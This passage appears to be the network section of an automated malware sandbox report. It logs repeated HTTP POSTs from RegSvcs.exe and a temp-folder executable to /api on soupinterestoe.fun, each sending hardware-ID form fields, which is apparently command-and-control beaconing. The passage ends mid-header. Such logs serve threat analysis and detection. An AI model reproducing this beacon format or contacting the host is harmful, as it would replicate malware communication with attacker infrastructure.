Dec 27, 2023 18:12:53.617316008 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:12:54.149698973 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=ukokh6r9sc9o5h1526ja3b7je9; expires=Sun, 21-Apr-2024 10:59:32 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:54 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:54 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:54 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xE3T2KG%2FXYBtbS3AT937cJT0EIvEJvhjpcIkIUmxHqCCYLFpv0cj2IDfsRnQIgeLzf4pMeEINVH0j%2BbVtOwbwv9dv0vxsTsJJbTNOgz8cOxhMbnmfMWB%2B8fIKQJ5C6ky7Nr56Z8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c330e78db Data Raw: Data Ascii:
Dec 27, 2023 18:12:54.149714947 CET	39	IN	Data Raw: 36 63 31 34 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 6c14-DFW15Malformed packet data
Dec 27, 2023 18:12:54.149727106 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49765	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:12:54.055958986 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 18:12:54.056010962 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:12:54.584350109 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=u46lt30ceust21bkquvlbnhngl; expires=Sun, 21-Apr-2024 10:59:33 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:54 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:54 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:54 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q%2Fao9XMNCoUwlnxBGzW%2Fm0E4lRZxFCTrQGwJzUvVEifu5WgK2eo6HRL68Ofhqeh8JsD9DnuYdhjYPV%2BS6khBwRCe3dHVgW7Ffe4CUiRJnoSYLY6INR4bnHo0TG1PL8awFB9aT34%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c330ea3e5 Data Raw: Data Ascii:
Dec 27, 2023 18:12:54.584364891 CET	39	IN	Data Raw: 36 62 38 38 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 6b88-DFW15Malformed packet data
Dec 27, 2023 18:12:54.584377050 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49767	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:12:54.331187963 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 18:12:54.331640005 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:12:54.714989901 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=p0hstfaqg1di32f0aaq8ku8fiu; expires=Sun, 21-Apr-2024 10:59:33 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:54 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:54 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:54 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YyKNJWL%2F9U23kOLCG8VePCi1TqqPgsvNrBR%2BqR8N3dmXxq9Nte1%2Bx0OVhYEsbL7cnyfo3K9wTl5j7JnBxECfiEoY7%2F%2FmFC6ioc6mRnxEory8y0eV7DGqxN6Uo5cmp1unpAln0Bg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c330e Data Raw: Data Ascii:
Dec 27, 2023 18:12:54.715003967 CET	43	IN	Data Raw: 66 61 30 34 32 63 62 64 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: fa042cbd-DFW15Malformed packet data
Dec 27, 2023 18:12:54.715013981 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49768	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:12:54.803472042 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 18:12:54.803733110 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:12:55.180999041 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=tkna5m3esaq9f6brvtso18qj7s; expires=Sun, 21-Apr-2024 10:59:34 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:55 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:55 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:55 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=e8YPlBCJV0ttZbohiUXzowBu0CHDqRyYdHB2029tJNSfYSyMS81INcGzIpduivBdcm6SzQRw9pSkSDu7WYPtehwLQbFnLLdJHYSGAimuiBt4auNbD82zwzqFoxU0K47NOWouUZg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c330eee9db46ce- Data Raw: Data Ascii:
Dec 27, 2023 18:12:55.181011915 CET	33	IN	Data Raw: 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: FW15Malformed packet data
Dec 27, 2023 18:12:55.181021929 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49769	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:12:55.106894016 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 18:12:55.107116938 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:12:55.489315987 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=v6ogoqcavu0afcr16blu6cshen; expires=Sun, 21-Apr-2024 10:59:34 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:55 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:55 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:55 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xgOWcZooypbXK%2B4xGsaxGHa%2BiiyykVQnpYN0InBhbBYk8apOJs9f9azwecn3cQoQBvmVhaaig5N74UI094m9N%2FRcQhb5zFGgKnIGeaX8wdsSjUIwZVfXaiql4Hv1Hdwoz1mN7Ng%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c330f0df5 Data Raw: Data Ascii:
Dec 27, 2023 18:12:55.489332914 CET	39	IN	Data Raw: 36 62 61 63 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 6bac-DFW15Malformed packet data
Dec 27, 2023 18:12:55.489346027 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49770	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:12:55.638832092 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 18:12:55.638958931 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:12:56.176553011 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=aj2gkjmitcokb0hblbr2tvis7j; expires=Sun, 21-Apr-2024 10:59:35 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:56 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:56 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:56 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=muHYpVHlrkDu0VgS6esB8G9ZxbayBC6KowZIjj47F%2FBaxAbZvwqiQeSTdyeLeQVuRJfz1br%2FonRJ6LOMgREUWB6PhHyhCs7xkK8640K03cm3UwPAMqTANDltSY4n6p6O1vbI3ns%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c330f42b2ae Data Raw: Data Ascii:
Dec 27, 2023 18:12:56.176567078 CET	37	IN	Data Raw: 30 39 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 09-DFW15Malformed packet data
Dec 27, 2023 18:12:56.176577091 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49771	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:12:55.893151045 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 18:12:55.893384933 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:12:56.291603088 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=9bqas3tn4th1uhe47hlh25bohj; expires=Sun, 21-Apr-2024 10:59:35 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:56 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:56 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:56 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fnzN1tNCiiX31DZVNfw8S2aMTmXO5ZwwP2rdTfUP4NZn8w4mC%2BISvPc8d1OkDhhEZLkChHAWZfyNPlePTgAR5gyez1aJ6t10PJppCmECrt4Ti%2B53oZLEjwnw%2BEufZJ%2BBvC4dgm8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c330f5b Data Raw: Data Ascii:
Dec 27, 2023 18:12:56.291615963 CET	41	IN	Data Raw: 30 31 36 62 36 31 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 016b61-DFW15Malformed packet data
Dec 27, 2023 18:12:56.291625977 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49773	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:12:56.513550997 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 18:12:56.513766050 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:12:56.893033028 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=ivvnj4qn8nosqal9nleol2hpsl; expires=Sun, 21-Apr-2024 10:59:35 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:56 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:56 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:56 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dy0j%2Bzn9GXKgz9kAesrLSUfgk9oerGGI70ePMlLGqjsKbG4Nl2s9sBMnR0OlHaori%2FRyq4ZL6IcfbBex%2FnERH5qu3%2FzHnDcjMANU1DFb6o8oG1I94aPp3GURyStseBEITAVaLwA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c330f99 Data Raw: Data Ascii:
Dec 27, 2023 18:12:56.893055916 CET	41	IN	Data Raw: 34 30 65 39 62 64 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 40e9bd-DFW15Malformed packet data
Dec 27, 2023 18:12:56.893068075 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49774	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:12:56.553350925 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 18:12:56.553477049 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:12:57.084484100 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=8joj0k02kt63nf3llsd2qe4vdk; expires=Sun, 21-Apr-2024 10:59:35 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:56 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:56 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:56 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, 